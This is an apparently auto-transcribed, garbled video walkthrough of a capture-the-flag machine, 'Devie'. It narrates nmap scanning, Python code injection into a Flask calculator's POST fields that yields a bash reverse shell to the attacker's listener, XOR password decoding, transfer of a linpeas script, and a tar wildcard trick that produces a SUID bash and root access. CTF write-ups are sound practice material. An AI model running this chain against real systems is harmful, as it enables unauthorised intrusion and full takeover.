We're on the Devie CTF, bro. We're on the Devie CTF. We got in here the Devie CTF to here. I got the 0 points for the CTF. I got the 0 points for the CTF guy. I did nothing before for the CTF. Now it's time to be sold with you. And there's an difficulties medium. It's gonna be hard, bro. It's gonna be hard. Yeah. We just have the one goal here to hack this machine. Which machine is work this IP address? Okay. Now it's time to be hack this machine. Okay. Just focus on and all right. Say so. Help to me hack this machine. So the first thing about this IP address. So we got in here the IP address. The first thing, I think we just have to be sorting here mmap scan for this IP address. I'm just gonna give here mmap -sc -sv -pn. You know, is -sc giving us the default secrets. I know that here the -sv is giving the version number, and I give this IP address and I check this which port is open here and which port is running on this which protocol to here. Which port is on which protocol is running on the here. Okay, which port is which the protocol is running on the here guy. So the other things we just have to be go there. It's giving us nothing here because there is a no AD port is open. So we just have to be waiting for which web server is open to here. We just have to be waiting for it. Which for the web server, it's the which port is running on the web server. We just have to be waiting for it. So let me try it here. 88. Now it's not gonna be working. So we just have to be waiting for the mmap scan result. It's giving us the which HTTP protocol in this which port. Maybe there is no HTTP protocol. I don't know. But I know we just have to be waiting for it. We just have to be waiting for it. And which port is running on the HTTP protocol. We just have to be waiting for it, guys. Okay, so let me try one more time. No, there is no result to us. So, okay, let me say to here ping for this. Yeah, it's giving us this connection to us. It's getting there, sending the byte here. So there is nothing on my DV directory. You can actually create this on your documentation or what you want. We just have to be waiting here. We just have to be waiting here to mmap results. It's giving us this HTTP protocol, I think. So there is an DV. A developer has asked you to do a vulnerability check on their system. Okay, we got in here the pen test. Alright, we got in there's an mmap result is over here. It's giving us the port in the 5000s. We just have to be go there in the 5000 for HTTP protocol. Yeah, we got in something here. And this 5000 is running under here UPnP. There's the question mark. It's unknown here. Running on the server, and there's a 22 port is open. So we got in here the 22 ports, and that means we can actually use here to using SSH. And we getting here there's some result for us on the 5000 port. So 5000 port is running for us on the web server. We just have to be looking here the web server guys working for us. So just look at this. So math formulas. Feel free to use any calculators below. A quadratic formula is A equal 1, B equal 3, and C equal 2. If I'm gonna say submit, it's giving us a result here, right? Okay. You just have to be go there. So let me go to here, cd home Elliot, and downloads. Say ls here. We got in here the source zip. We just actually use this for source zip. We getting, if you say check here, it's giving us a source zip to here. So let me cp this on Devie. Yeah, like there. So we get in here. There's another source zips. So let me unzip them and then check it for in. Unzip source zip. So we got in here the something. It's giving us this math directory to here. So let me go to math directory. There's an app Python, a bisection Python, a prime.python, a quadratic Python. There's an templates. I think there's an index HTML. Yes, that's true. So let me clear all of things to here and say cat app.python. We got in here the some result. We got in here the some result. We got in here some result, guys. We got in here the some result. So if I'm gonna be copy this and then ask them the chat GPT, what's this? Okay, what's this? So what? Are we gonna be waiting here, waiting there? So no. Are we gonna be waiting there? Are we gonna be waiting there, guy? I don't know. So let me try. What? Why is rocket or orange? What's the orange meaning? What's the orange meaning on ChatGPT? What's the orange meaning in ChatGPT? We're getting nothing here. Oh, maybe our internet is gonna be working not. Okay, so what? So let me go to ChatGPT. What's wrong? What's wrong? Ah, yeah, we got in here. So let me go to ChatGPT 4 and then paste it to what this code go. Alright, we just have to be ask the ChatGPT what this code go. What is called the goal guy? Okay. To here, the Flask application that provides the mathematical problems, the quadratic education solving. The application receives the confidence as A, B, D, C, C, D like that. So, there isn't any good things. Yeah, we got in here. This application uses post requests to receive inputs from the users and performs the necessary calculation or server side. The results are rendered back to user via template on index.html. Okay, I understand here. I understand here, guy. Okay, I understand. We just have to be run this code. Okay. The serving Flask app lazy loading environment production user production VSIG server instead debug mode off running all address and then running on HTTP running on HTTP no 5000 protocol. I think we just be starting here Burp Suite Community Edition. Okay. Just starting here Burp Suite Community Edition. Just starting here Burp Suite Community Edition, guy. So there are one more thing, so I just gonna be use that. Controller use if anything to here for us. Nope, no, there's a CSS. It's giving us integrity to here. What does it mean? What does it mean? What does it mean, guy? There, the XA name XA required text value 1 and XP required type text value 3. Why is not E and B? Why is an XA and XP? I don't know. Yeah. Okay. Why is giving us all of things to here 1 and 3? The roots are it's actually and the often 0.38 and 2.62. I don't know. Well, maybe we just have to be looking for on the burp suite, guy. I don't know, guy. So let me say intercept is on here and say here burp is open there and go my math. You know, is it the 5000 port for this IP address? For example, check it here the submit. Okay, we getting something there. You know, there is an we getting before. It's using the post to hear the when I ask the chat GPT is giving us this. This application uses post records, receives inputs user and performs. So that's cool. Alright, just I want to be sent here on the repeater, and now we can intercept this on and the turn off Fox proxy and go my repeater. And if I'm gonna say here send, what's the result? There's no result. Oh guys, bro, it's not fucking. There is no result. There is no result. What? Alright, let me say it here on the XA, the PW, for example. I just want to be sent that. The server encountered an internal error and was enabled complete your request. Either the server is overloaded, there is an error in the application. What does it mean? What does it mean? I don't know what does it mean. I would just want to be using here some Python code. If I'm gonna say here print and say here 1, for example, I'm just gonna be sent as no. Why? Why is not gonna working? What's the meaning to here? What's the meaning to here? What's the meaning to here, guy? What's the meaning to here? Let me say sound one more time. What's the meaning to here? I don't know. Let me change this and with the percent for 26. So sometime nothing to here. Okay, we getting the nothing here again. So okay. Let me try here this hashtag. For example, no, it's not giving us nothing here. Alright, we know they are using their Python code here. So Python code reverse shell. Not reverse shell actually. Yeah, it's gonna be make me reverse shell. It doesn't matter. The TCP reverse shell, the Python offensive pen test. Maybe it's gonna be working. I don't know. So. Alright, I got something. Let me try it here. Okay, let me try it here. Okay, I got something. Let me try it here. There's a 7.7. No, 7 times 7. No, there's no result. Are we getting here the Haskell injection or something like that as a comma and execution? No. You want to be write this manually? Hack your neighbors. Python reverse shell, hack your neighbors. I don't want to hack my neighbors. I just want to be looking for the here guy, the operation system. Just want to be looking here the operation system. Python code reverse shell operation system. Yeah, I want to be using model of us. I just want to be using here the model operation system. I just want to be using here the operation system guy, not like that. No, I don't like it. No, I'm not just looking for it. I'm just not looking here the operation system guys. I'm just looking here the operation system. Not like there's guys. Yeah, it could be like that now. The for yeah, come on, what's wrong? I actually know about it starting with under dash import operation system. Yeah, guys, shall they? Yeah, why I'm looking here. Yeah, like that. Yeah, like that. I just want to be used that. I just want to be used that. I just want to be used that. All right, we just can I use it like that? So let me try. Okay, let me try it here. Let me try it here. So okay, let me try it here. Intercept the zone one more time and go here the math and the burp it and the submit it and then go here the repeater and look for it. Yeah, that's now true. Okay, intercept the zone. The repeater is the return of the Fox proxy. Okay, the add here. Okay, the add here under dash import and under dash could be the parentheses and here single quotation mark, or module is equal to operating system, and I say here dot system, and then the add here, or yeah, we just have to be add there or those the output module here. We just have to be getting here the reverse shell. Our reverse shell could be equal to bash dash c. We just have to be equal to the add here the plus. So I just want to be write this manual and then add the plus again bash dash I, and then the here is could be larger than and say here developer and then TCP. We just have to be using here TCP and give your IP address to here 10.8.72.270 and give there is actually guy your the what you want to be listening. I just want to be use here 9001 and I say here 0 is larger than and 1. Yeah, like that is definitely could be like that. So alright, it's definitely could be like that, the add here this hashtag. So now I think we just have to be adding here the for the space one is the plus. So add me here the plus and add me here the plus. So if I'm gonna say here the back, what's the result? Okay, add here. No, like there. I just want to be use it for it. And yeah, like that. I think it's fine. No, it's not. It's not fine. We just have to be adding here. And to for this, let me use here is the 24. So if I'm gonna starting here, ancat dash mlp for 9001. Okay, let me send it. It's not giving us nothing. So because we are not gonna be listening here. Okay, let me send it one more time. So we got in here the nothing. We got in here the nothing, guys. We got in here the nothing. Why? So maybe we just have to be changed down with the person at 26. No, I think not. No. Okay. All right. Or is and to here. Okay. What's wrong? What's wrong? What's wrong, guy? Alright, we got in here this shell, guy. We got in here the shell. You just have to be add here this double under dash and then give here the parentheses and the single quotation mark is middle of equal to operating system and the bash plus dash c and the plus that under bash plus dash I div TCP and give your IP address. No, give your IP address. So for the here the and just have to be change it to with this the percent is 26. You just have to be change it with the percent is 26. You just have to be out here the percent is 26. If I'm gonna say here the ls, we got in here the first flag, so that was really fine. So if I just want to give this for cap flag 1tx. So we got in here the first flag. We got in here the first flag. Is it gonna correct? Yes, we got in here the first flag, guy. We got in here the first flag. That's really cool. Okay, so what's next? So I want to be using here using for the bash file. So I just want to be add here Python 3 and dash c to here import putty dot spawn, no putty, and then putty, yeah, like that, dot spawn, and add here parentheses quotation mark slash pin bash quotation mark parentheses and single quotation mark. Yeah, we got in here. Now it's time to be run their tput lines and the tput the clones to here tput lines and yeah, like that. So this is giving us this tput calls. Yes, we got in here. All right, that's really fine. The second one, we just have to be sorting here. Export term is could be equal to x term. Controller Z CTT row echo dash FG. Now we can use in here this like Kali Linux. So we can use that with the bash. Okay, we can use the or reverse shell like bash. We can use the or reverse shell like bash, guys. Really cool. So let me say here the ls is giving us the checklist and not here. So let me cat now. Hello Bruce. I have encoded my password using the super secure XOR format. I have encoded my password using the super secure XOR format. I made the key quite lengthy and spiced it with the some base 64 and to make it even more secure. I will share the decoding scripts it soon. However, you can use my script located on op directory. For now, look at the super secure string here. There is all the super secure strings. This is all the super secure string. We just have to be use that super secure string. Okay. So let me say ls one more time. There's a checklist. Is that a directory or file? The checklist is yeah. The first one, web application checklist. Build site with under dash check. The test site and under dash check. And move site production under dash check. And remove dangerous function from the site. So now we just have to look for the out. We got in here the encrypt.python. We got in here the encrypt.python. We just have to be using for this for encrypt. So if I'm gonna use here the Python 3 encrypt.python. Now the permission they need. The permission they need to here. Encrypt. Okay. The permission they need to here. What? Where are we getting here the permission they need to hear? How can I use it? How can I use it? So we just have to be cpd it. So cp encrypt.python from the hub and then Bruce. The permission for the reading. So what? We just have to be using here the limpis.shell. Encrypt.python. Encrypt. So encrypt.python. No. We're gonna hear the encrypt.python. So let me say here the sudo-l. Alright, we got in here the something. User Bruce may run the following commands on the device. Gordon, no password needed. User bin Python 3 and opt encrypt.python. We just have to be use this. Okay, let me say here sudo and the user bin Python 3 and opt encrypt.python to here. Okay. Let me paste it. Sudo password for Bruce, I don't know. So let me use it with sudo. Let me use it with sudo guy. The permission they need to hear. What's wrong? We gotta what's wrong to here? Let me say the sudo-l to here one more time. We got in here the Gordon. Oh, we just have to be using with Gordon. Okay, let me say the here sudo-u with Gordon. Okay. User binary Python 3 and opt encrypt.python. Pass clipboard. Enter password to encrypt. We got in here. Okay, enter password to encrypt. I don't know. I just want to be at here the Anderson. Not like that is definitely the enter password to encrypt. I just want to be at here iram.123. So okay, we got in here there's some decoding here. So let me decode. Go here, Cyber Chef. Salam alaikum. Salam alaikum. Well, let me input them and I see here from base 64 we got in here there's the fucking the asshole the things here. So and if I'm gonna say here So let me go to here cd home ls cd Bruce, no, cd Bruce ls and the cat, no. We got in here the something, guys. I have encoded my password using secure XOR format. So we just have to be adding here the XOR. So let me check it here, the XOR. The XOR is here as a K. There's not hex decimal, it's on U2F8 and the IRM the 1 2 3. So supersec is on the supersec. We got in here the supersec. Alright, we got in here the supersec. Now I think our new K is the for XOR is supersec. Okay, now we can use them. They'll know you that like as another for this basics for encoding to here. And the for K we just have to be using here supersec. Okay, we got in here. We got the password for Gordon. We got the password for Gordon here. So let me say Gordon, and then this is our Gordon password. And I say here in the new file. Let me use here SSH for Gordon, and add here this IP address is definitely. So let me enter and say definitely yes, and for password, the password is equal this. This password is equal this. No, it's not. No. What? It's not working? Oh my god, it's not working. Garden. Garden. And give this password. It's giving an authentication failure? No. What? So we got in here, there's something here wrong. So let me go to here opt one more time, and then sudo then dash u Gordon, and then no, the first thing you just have to be adding here sudo dash l, and the sudo dash u Gordon. Okay, let me use that. Enter a password to encrypt. Okay, IRM 1 2 3. Enter. We get in here the something or new result here. So add here. And then for supersec, so when we add here IRM 1 2 3. Supersec one more time. And then let me copy. No, let me copy this. And then say here the paste. For the K, and then let me go there. This is all the basics for an XOR for using to here. Now it's giving us the same things to here. I think it's not gonna be working. We have just be trying with something wrong. The enter a password to encrypt. So let me say to here linear algebra dot 1 2 3. Alright, we got in here the same decoding for stuff, and then say here linear algebra dot 1 2 3 super secret K XOR. Okay, we got in here the new secret K for here. We got in here the new K. We got in here the new K. We got in here the new K, guy. I think it's gonna be working now. So let me copy this. Alright, let me copy this. And super secret K XOR. This is our new K here. This is our new K. We got in here the new password. We got in here the new password. Alright, no, here. I just want to be at here. This is our new password. This is our new password. So let me try on the SSH. Oh my god, we hacked the Gordon machine. We hacked the Gordon machine. We hacked the Gordon machine here. We got in here the flag 2txt. We hacked the Gordon machine. Oh my god, this is all the second flag. Yes, we got in here the second flag, guys. It's really cool. It's really cool. Yeah, it's really cool. So now it's time to be privilege escalation. Now it's time to be privilege escalation. So let's do privilege escalation to here. ls and go here, for example in sudo -l, we got in here there's something wrong, so nope. Okay, this is already new password, just have to be paste this. Sorry, user guard the main root on sudo on Devie. Okay. Let me see here cd home. No, cd home. Okay, let me say here find /-perm and -u equal to s and 2 is larger than developer and null. I think we got in here is the for privilege escalation, looking for something to hear, guy. Looking for something to hear. Looking for something to hear. I was waiting for this ending. Okay, let me give it. It's giving us something, right? So it's really cool. Is it gonna be cool? It's not giving us any file to be we can use for privilege escalation. So let me go here the TMP. Alright, now it's time to be running here cd opt. And a Python 3 no -m http server to here, and then we just have to be transfer the limpis.shell. So say here widget http and a no like that http //10.8.72.270 with this port, and then give this the file name limpis.shell. Alright, or limpis.shell is already here, station mode class X and the limpis.shell we got in here. So we're running limpis.shell. So we just have to be waiting for the limpis.shell. You just have to be waiting for the limpis.shell. We got in here the privilege escalation with the limpis.shell. Oh, it's ending? So, okay. It's ending. It's ending, huh? So let me analyze for it. Before looking for the root. This is the root file. And the map file Bruce. Okay, we got in here the backup on the user binary. Yeah, home backup report 1, report 3 and report 3 to here. Gordon backups. Okay. We got in here the report file. Okay, backups. This had to be go there. So let me say cd home. ls cd Gordon. ls cd backup. There's a report 1, report 2 and report 3. I'm beginning of the thing Batman is Bruce. So let me cut all of things to here. I am beginning to think the Batman is Bruce. Nah, I thought Bruce his website is still vulnerable, but he didn't listen. Finishing my XOR scripts found the vulnerabilities, shared permission with the Bruce for execution only. Okay, we got in here the let me go here the back, and there's a report files is already here. We just have to be go here. Is it the same thing? Yeah, it's the same thing. So now it's time to be privilege escalation to here. Now it's time to be privilege escalation with this. Okay, this is really cool. We just have to be working with the reports and backups file to here, and gathering privilege escalation to like that. So I think it's fine. Okay, we are on the reports, right? So if I'm gonna add here CP binary to bash and say here that ls-la, this is in the bash file, is already here. So let me switch to for here for executed. They're using for the 4755. The bash file is running here. So let me touch to here and to touch and dash and say here quotation mark and say here p reserve could be equal to mod. Okay, to here is definitely to preserve the mod here. Okay, so now it's time to go back and allow cd backups. You got in here the bash. Now it's time to run this bash dash p. Yeah, guy, we got in here the root. We are in the root, guy. We are root. We getting root. We getting root. We getting root. We getting root here. We getting root here. That was easy peasy, guy. That was really easy peasy. That was really easy peasy. Thank you for watching this video. That was a really easy peasy, guy. So why is not